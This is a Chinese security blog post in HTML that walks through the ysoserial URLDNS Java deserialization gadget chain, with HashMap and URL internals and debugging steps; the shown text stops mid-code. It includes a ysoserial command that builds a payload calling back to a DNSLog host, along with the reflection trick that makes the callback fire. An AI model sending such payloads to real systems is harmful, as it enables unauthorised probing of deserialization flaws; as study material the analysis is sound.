<!DOCTYPE html>
<html lang=zh>
<head><!-- hexo injector head_begin start --><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.2/dist/css/bootstrap.min.css" crossorigin="anonymous"><!-- hexo injector head_begin end -->
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="环境准备 这是反序列化系列的第一篇文章，所以先简单介绍下环境搭建以及如何调试  ysoserial ysoserial是一款用于生成反序列化数据的工具。攻击者可以选择利用链和输入自定义命令，然后通过该工具生成对应的反序列化利用数据，然后将生成的数据发送给存在漏洞的目标，从而执行命令。   安装多个不同版本 JDK，因为有些利用链有版本限制，这里是8u291和8u66 下载 ysoserial 源码">
<meta property="og:type" content="article">
<meta property="og:title" content="Java安全漫谈-URLDNS篇">
<meta property="og:url" content="https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html">
<meta property="og:site_name" content="M1r0ku">
<meta property="og:description" content="环境准备 这是反序列化系列的第一篇文章，所以先简单介绍下环境搭建以及如何调试  ysoserial ysoserial是一款用于生成反序列化数据的工具。攻击者可以选择利用链和输入自定义命令，然后通过该工具生成对应的反序列化利用数据，然后将生成的数据发送给存在漏洞的目标，从而执行命令。   安装多个不同版本 JDK，因为有些利用链有版本限制，这里是8u291和8u66 下载 ysoserial 源码">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://www.m1r0ku.com/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-0.png">
<meta property="og:image" content="https://www.m1r0ku.com/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-1.png">
<meta property="og:image" content="https://www.m1r0ku.com/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-2.png">
<meta property="og:image" content="https://www.m1r0ku.com/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-3.png">
<meta property="og:image" content="https://www.m1r0ku.com/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-4.png">
<meta property="og:image" content="https://www.m1r0ku.com/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-5.png">
<meta property="og:image" content="https://www.m1r0ku.com/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-6.png">
<meta property="article:published_time" content="2023-02-24T16:00:00.000Z">
<meta property="article:modified_time" content="2024-02-04T18:10:34.121Z">
<meta property="article:author" content="M1r0ku">
<meta property="article:tag" content="反序列化">
<meta property="article:tag" content="Ysoserial">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://www.m1r0ku.com/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-0.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Java安全漫谈-URLDNS篇</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="M1r0ku" type="application/atom+xml" />
    
	<!-- mathjax -->
	

  <!-- FancyBox -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/ui@4.0/dist/fancybox.css" crossorigin="anonymous" />
  
  
<meta name="generator" content="Hexo 6.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/lists/">Lists</a></li><!--
     --><!--
       --><li><a href="/links/">Links</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-CC1%E7%AF%87.html"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-RMI%E7%AF%87.html"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&text=Java安全漫谈-URLDNS篇"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&title=Java安全漫谈-URLDNS篇"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&is_video=false&description=Java安全漫谈-URLDNS篇"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Java安全漫谈-URLDNS篇&body=Check out this article: https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&title=Java安全漫谈-URLDNS篇"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&title=Java安全漫谈-URLDNS篇"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&title=Java安全漫谈-URLDNS篇"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&title=Java安全漫谈-URLDNS篇"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&name=Java安全漫谈-URLDNS篇&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://www.m1r0ku.com/posts/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87.html&t=Java安全漫谈-URLDNS篇"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E5%87%86%E5%A4%87"><span class="toc-number">1.</span> <span class="toc-text">环境准备</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#ysoserial"><span class="toc-number">1.1.</span> <span class="toc-text">ysoserial</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Gadget"><span class="toc-number">1.2.</span> <span class="toc-text">Gadget</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%82%E6%95%B0%E9%85%8D%E7%BD%AE"><span class="toc-number">1.3.</span> <span class="toc-text">参数配置</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">利用链分析</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8E%B7%E5%8F%96%E7%B1%BB%E5%AF%B9%E8%B1%A1"><span class="toc-number">2.1.</span> <span class="toc-text">获取类对象</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9E%84%E9%80%A0%E6%81%B6%E6%84%8F%E5%BA%8F%E5%88%97%E5%8C%96%E5%AF%B9%E8%B1%A1"><span class="toc-number">2.2.</span> <span class="toc-text">构造恶意序列化对象</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E8%A7%A6%E5%8F%91"><span class="toc-number">3.</span> <span class="toc-text">反序列化触发</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E9%93%BE%E6%9E%84%E9%80%A0"><span class="toc-number">4.</span> <span class="toc-text">利用链构造</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Java安全漫谈-URLDNS篇
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">M1r0ku</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-02-24T16:00:00.000Z" itemprop="datePublished">2023-02-25</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/Java/">Java</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/Ysoserial/" rel="tag">Ysoserial</a>, <a class="tag-link-link" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">反序列化</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="环境准备"><a href="#环境准备" class="headerlink" title="环境准备"></a>环境准备</h2><blockquote>
<p>这是反序列化系列的第一篇文章，所以先简单介绍下环境搭建以及如何调试</p>
</blockquote>
<h3 id="ysoserial"><a href="#ysoserial" class="headerlink" title="ysoserial"></a>ysoserial</h3><blockquote>
<p><a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial">ysoserial</a>是一款用于生成反序列化数据的工具。攻击者可以选择利用链和输入自定义命令，然后通过该工具生成对应的反序列化利用数据，然后将生成的数据发送给存在漏洞的目标，从而执行命令。</p>
</blockquote>
<ul>
<li>安装多个不同版本 JDK，因为有些利用链有版本限制，这里是<code>8u291</code>和<code>8u66</code></li>
<li>下载 <a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial">ysoserial</a> 源码到本地，该工具包含了所需要的依赖库，只需要 Maven 导入即可；<ul>
<li>如果依赖有问题，可以手工点击菜单里的<code>Files - Project Structure</code>配置<code>Libraries</code></li>
</ul>
</li>
<li>将<code>src/test/java/</code>目录下的文件全部删除，后续在这个目录下编写的测试类；最后将 <a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial/releases/">ysoserial-all.jar</a> 下载到本地，便于生成序列化数据进行测试。</li>
</ul>
<p>最终主要目录结构如下：<br><a data-fancybox="gallery" data-src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-0.png" data-caption="Java安全漫谈-URLDNS篇-0"><img src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-0.png" alt="Java安全漫谈-URLDNS篇-0"></a></p>
<h3 id="Gadget"><a href="#Gadget" class="headerlink" title="Gadget"></a>Gadget</h3><blockquote>
<p>Gadget 就是利用链，也叫 Gadget Chains，它连接的是<strong>从触发位置开始到执行命令的位置结束</strong>。</p>
</blockquote>
<p>ysoserial 中存在着很多条 Gadget，而使用 Gadget 时都会调用其中的<code>getObject()</code>方法，该方法会返回一个对象，最后将该对象进行序列化；如果目标存在反序列化漏洞，并满足这个 Gadget 对应的条件。那么在将这个 Gadget 所对应生成的序列化对象发送给目标时，目标会对其进行反序列化，最终导致序列化对象中的恶意命令被执行。<br>运行 <a target="_blank" rel="noopener" href="https://github.com/frohoff/ysoserial/releases/">ysoserial-all.jar</a> 工具简单生成了一条 URLDNS 的 POC：</p>
<figure class="highlight bash"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-obhx64ls7tkuws"></i><span>  Bash  </span><div class="collapse show" id="collapse-obhx64ls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ java -jar ysoserial-all.jar URLDNS <span class="string">&quot;http://xxx.dnslog.cn&quot;</span> &gt; dnslog.ser</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<h3 id="参数配置"><a href="#参数配置" class="headerlink" title="参数配置"></a>参数配置</h3><p>在<code>pom.xml</code>文件中找到入口文件，也就是<code>GeneratePayload.java</code></p>
<figure class="highlight xml"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-1tgzwrls7tkuws"></i><span>  Xml  </span><div class="collapse show" id="collapse-1tgzwrls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">manifest</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">mainClass</span>&gt;</span>ysoserial.GeneratePayload<span class="tag">&lt;/<span class="name">mainClass</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">manifest</span>&gt;</span></span><br></pre></td></tr></table></div></figure>
<p>在<code>GeneratePayload.java</code>的<code>main</code>函数处添加断点，然后右上角修改配置，添加所需参数，最后点击调试<br><a data-fancybox="gallery" data-src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-1.png" data-caption="Java安全漫谈-URLDNS篇-1"><img src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-1.png" alt="Java安全漫谈-URLDNS篇-1"></a></p>
<h2 id="利用链分析"><a href="#利用链分析" class="headerlink" title="利用链分析"></a>利用链分析</h2><p>利用链：</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-18l7qcls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-18l7qcls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Gadget Chain:</span><br><span class="line">  HashMap.readObject()</span><br><span class="line">    HashMap.putVal()</span><br><span class="line">      HashMap.hash()</span><br><span class="line">        URL.hashCode()</span><br></pre></td></tr></table></div></figure>

<h3 id="获取类对象"><a href="#获取类对象" class="headerlink" title="获取类对象"></a>获取类对象</h3><blockquote>
<p>这部分会先获取所调用的 Gadget 的类对象，这里是 URLDNS 的类对象，后续其他 Gadget 也是同理</p>
</blockquote>
<p>首先 ysoserial 接收到参数并分别赋值，接着跟进<code>Utils.getPayloadClass(&quot;URLDNS&quot;)</code>方法</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-e6698dls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-e6698dls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">final</span> <span class="type">String</span> <span class="variable">payloadType</span> <span class="operator">=</span> args[<span class="number">0</span>];  <span class="comment">// URLDNS</span></span><br><span class="line"><span class="keyword">final</span> <span class="type">String</span> <span class="variable">command</span> <span class="operator">=</span> args[<span class="number">1</span>];      <span class="comment">// &lt;DNGLog平台地址&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p><a data-fancybox="gallery" data-src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-2.png" data-caption="Java安全漫谈-URLDNS篇-2"><img src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-2.png" alt="Java安全漫谈-URLDNS篇-2"></a><br>在<code>getPayloadClass()</code>方法中，通过反射获取到传入的<code>URLDNS</code>的 Class 对象并返回</p>
<ul>
<li>这里一开始的<code>Class.forName(&quot;URLDNS&quot;)</code>并没有找到对应的类对象，所以<code>clazz == null</code></li>
<li>进入<code>if</code>语句后，通过拼接完整类名<code>ysoserial.payloads.URLDNS</code>后才获取到类对象</li>
</ul>
<p><a data-fancybox="gallery" data-src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-3.png" data-caption="Java安全漫谈-URLDNS篇-3"><img src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-3.png" alt="Java安全漫谈-URLDNS篇-3"></a></p>
<h3 id="构造恶意序列化对象"><a href="#构造恶意序列化对象" class="headerlink" title="构造恶意序列化对象"></a>构造恶意序列化对象</h3><blockquote>
<p>这条 URLDNS 链的重点就是如何构造一个恶意的 HashMap 序列化对象并返回</p>
</blockquote>
<p><code>URLDNS</code>的 Class 对象返回后将赋值给<code>payloadClass</code>，然后执行<code>newInstance()</code>方法创建实例，并调用该实例的<code>getObject()</code>方法，并将 DNSLog 平台地址作为参数传入<br><a data-fancybox="gallery" data-src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-4.png" data-caption="Java安全漫谈-URLDNS篇-4"><img src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-4.png" alt="Java安全漫谈-URLDNS篇-4"></a><br>跟进<code>payload.getObject()</code>看看：</p>
<ul>
<li>创建<code>HashMap</code>对象和<code>URL</code>对象</li>
<li>调用<code>HashMap</code>对象的<code>put</code>方法，键为 URL 对象，值为传入的参数，即 DNSLog 平台地址</li>
<li>最后通过反射设置<code>URL</code>对象的<code>hashCode</code>设为<code>-1</code></li>
</ul>
<p><a data-fancybox="gallery" data-src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-5.png" data-caption="Java安全漫谈-URLDNS篇-5"><img src="/assets/Java%E5%AE%89%E5%85%A8%E6%BC%AB%E8%B0%88-URLDNS%E7%AF%87-5.png" alt="Java安全漫谈-URLDNS篇-5"></a></p>
<blockquote>
<p>为什么要通过反射将 URL 对象的<code>hashCode</code>的值为<code>-1</code>？原因已经在<code>URLDNS</code>的注释中：<br>During the put above, the URL’s hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.<br>设置这个 URL 对象的<code>hashCode</code>为初始值<code>-1</code>，这样反序列化时将会重新计算其<code>hashCode</code>，才能触发到后⾯的 DNS 请求，否则不会调⽤<code>URL#hashCode()</code></p>
</blockquote>
<p>最后将<code>HashMap</code>对象进行序列化并返回</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-i09y6sls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-i09y6sls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">final</span> <span class="type">Object</span> <span class="variable">object</span> <span class="operator">=</span> payload.getObject(command);</span><br><span class="line"><span class="type">PrintStream</span> <span class="variable">out</span> <span class="operator">=</span> System.out;</span><br><span class="line">Serializer.serialize(object, out);</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>

<h2 id="反序列化触发"><a href="#反序列化触发" class="headerlink" title="反序列化触发"></a>反序列化触发</h2><blockquote>
<p>触发反序列化的⽅法是<code>readObject()</code> ，因为 Java 开发者经常会在某些类中重写该方法，导致可以构造利⽤链。</p>
</blockquote>
<p>在 URLDNS 利用链中，ysoserial 先获取到了 URLDNS 的类对象，然后调用了该类对象<code>newInstance()</code>方法创建实例，然后调用该实例的<code>getObject()</code>方法获取到一个序列化后的<code>HashMap</code>对象。<br>因此在将这段序列化数据发送给目标，目标对其进行反序列化时，会触发<code>HashMap</code>对象的<code>readObject()</code>方法。所以可以直接看<code>HashMap</code>类的<code>readObject()</code>方法：</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-saa636ls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-saa636ls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">void</span> <span class="title function_">readObject</span><span class="params">(java.io.ObjectInputStream s)</span></span><br><span class="line">  <span class="keyword">throws</span> IOException, ClassNotFoundException &#123;</span><br><span class="line">  <span class="comment">// Read in the threshold (ignored), loadfactor, and any hidden stuff</span></span><br><span class="line">  s.defaultReadObject();</span><br><span class="line">  reinitialize();</span><br><span class="line">  <span class="keyword">if</span> (loadFactor &lt;= <span class="number">0</span> || Float.isNaN(loadFactor))</span><br><span class="line">    <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">InvalidObjectException</span>(<span class="string">&quot;Illegal load factor: &quot;</span> +</span><br><span class="line">                                     loadFactor);</span><br><span class="line">  s.readInt();                <span class="comment">// Read and ignore number of buckets</span></span><br><span class="line">  <span class="type">int</span> <span class="variable">mappings</span> <span class="operator">=</span> s.readInt(); <span class="comment">// Read number of mappings (size)</span></span><br><span class="line">  <span class="keyword">if</span> (mappings &lt; <span class="number">0</span>)</span><br><span class="line">    <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">InvalidObjectException</span>(<span class="string">&quot;Illegal mappings count: &quot;</span> +</span><br><span class="line">                                     mappings);</span><br><span class="line">  <span class="keyword">else</span> <span class="keyword">if</span> (mappings &gt; <span class="number">0</span>) &#123; <span class="comment">// (if zero, use defaults)</span></span><br><span class="line">    <span class="comment">// Size the table using given load factor only if within</span></span><br><span class="line">    <span class="comment">// range of 0.25...4.0</span></span><br><span class="line">    <span class="type">float</span> <span class="variable">lf</span> <span class="operator">=</span> Math.min(Math.max(<span class="number">0.25f</span>, loadFactor), <span class="number">4.0f</span>);</span><br><span class="line">    <span class="type">float</span> <span class="variable">fc</span> <span class="operator">=</span> (<span class="type">float</span>)mappings / lf + <span class="number">1.0f</span>;</span><br><span class="line">    <span class="type">int</span> <span class="variable">cap</span> <span class="operator">=</span> ((fc &lt; DEFAULT_INITIAL_CAPACITY) ?</span><br><span class="line">               DEFAULT_INITIAL_CAPACITY :</span><br><span class="line">               (fc &gt;= MAXIMUM_CAPACITY) ?</span><br><span class="line">               MAXIMUM_CAPACITY :</span><br><span class="line">               tableSizeFor((<span class="type">int</span>)fc));</span><br><span class="line">    <span class="type">float</span> <span class="variable">ft</span> <span class="operator">=</span> (<span class="type">float</span>)cap * lf;</span><br><span class="line">    threshold = ((cap &lt; MAXIMUM_CAPACITY &amp;&amp; ft &lt; MAXIMUM_CAPACITY) ?</span><br><span class="line">                 (<span class="type">int</span>)ft : Integer.MAX_VALUE);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Check Map.Entry[].class since it&#x27;s the nearest public type to</span></span><br><span class="line">    <span class="comment">// what we&#x27;re actually creating.</span></span><br><span class="line">    SharedSecrets.getJavaOISAccess().checkArray(s, Map.Entry[].class, cap);</span><br><span class="line">    <span class="meta">@SuppressWarnings(&#123;&quot;rawtypes&quot;,&quot;unchecked&quot;&#125;)</span></span><br><span class="line">      Node&lt;K,V&gt;[] tab = (Node&lt;K,V&gt;[])<span class="keyword">new</span> <span class="title class_">Node</span>[cap];</span><br><span class="line">    table = tab;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Read the keys and values, and put the mappings in the HashMap</span></span><br><span class="line">    <span class="keyword">for</span> (<span class="type">int</span> <span class="variable">i</span> <span class="operator">=</span> <span class="number">0</span>; i &lt; mappings; i++) &#123;</span><br><span class="line">      <span class="meta">@SuppressWarnings(&quot;unchecked&quot;)</span></span><br><span class="line">        <span class="type">K</span> <span class="variable">key</span> <span class="operator">=</span> (K) s.readObject();</span><br><span class="line">      <span class="meta">@SuppressWarnings(&quot;unchecked&quot;)</span></span><br><span class="line">        <span class="type">V</span> <span class="variable">value</span> <span class="operator">=</span> (V) s.readObject();</span><br><span class="line">      putVal(hash(key), key, value, <span class="literal">false</span>, <span class="literal">false</span>);</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></div></figure>
<p>在<code>HashMap</code>类中的第<code>41</code>行<code>putVal(hash(key), key, value, false, false);</code>处打下断点</p>
<blockquote>
<p>在没有分析过的情况下，为何关注 hash 函数？<br>因为 ysoserial 的注释中很明确地说明了“During the put above, the URL’s hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.”，是指 hashCode 的计算操作触发了DNS请求。</p>
</blockquote>
<p>创建一个简单的<code>TestDNS.java</code>文件并调试，程序将从<code>ois.readObject()</code>进入到<code>HashMap</code>类的断点</p>
<figure class="highlight java"><i class="fas fa-laptop-code" type="button" data-toggle="collapse" data-target="#collapse-728fbfls7tkuws"></i><span>  Java  </span><div class="collapse show" id="collapse-728fbfls7tkuws"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> deserialization;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.*;</span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">TestDNS</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> IOException, ClassNotFoundException &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">serfile</span> <span class="operator">=</span> <span class="string">&quot;src/test/java/dnslog.ser&quot;</span>;</span><br><span class="line">        <span 